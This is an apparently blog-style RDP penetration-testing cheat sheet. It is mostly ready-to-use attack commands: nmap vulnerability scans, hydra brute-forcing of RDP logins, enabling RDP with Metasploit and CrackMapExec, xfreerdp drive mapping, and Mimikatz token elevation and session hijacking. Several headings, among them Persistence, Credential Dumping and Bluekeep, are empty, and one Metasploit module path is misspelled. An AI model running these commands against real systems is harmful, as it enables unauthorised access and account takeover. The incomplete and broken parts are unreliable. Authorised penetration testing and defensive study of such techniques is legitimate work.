Welcome, today I am writing about RDP Penetration Testing fundamentals, I will explain how to enumerate Remote Desktop Service and how to use it to escalate privileges.
RDP Penetration Testing
Introduction
Enumerating RDP
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" 192.168.1.131 -p3389
Brute Force RDP
hydra -L userslist.txt -P wordlist.txt 192.168.1.131 rdp
Post Exploitation
Metasploit
use post/windows/mange/enable_rdp
set username rfs
set password Password123!
set session 1
exploit
CrackMapExec
crackmapexec smb '<IP>' -u '<User>' -p '<Password>' -M rdp -o ACTION=enable
Connecting to RDP
xfreerdp /v:'<IP>' /u:'<User>' /p:'<Password>'
xfreerdp /v:'<IP>' /u:'<User>' /p:'<Password>' +clipboard
#Maps specified folder on attacking machine to RDP host
xfreerdp /v:'<IP>' /u:'<User>' /p:'<Password>' +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share
Persistence
Credential Dumping
RDP Session Hijacking
Invoke-Mimikatz -Command '"ts::sessions"'
Invoke-Mimikatz -Command '"token::elevate" "ts::remote /id:4"'
Socks5 over RDP
https://github.com/nccgroup/SocksOverRDP
RDP Exploits
Bluekeep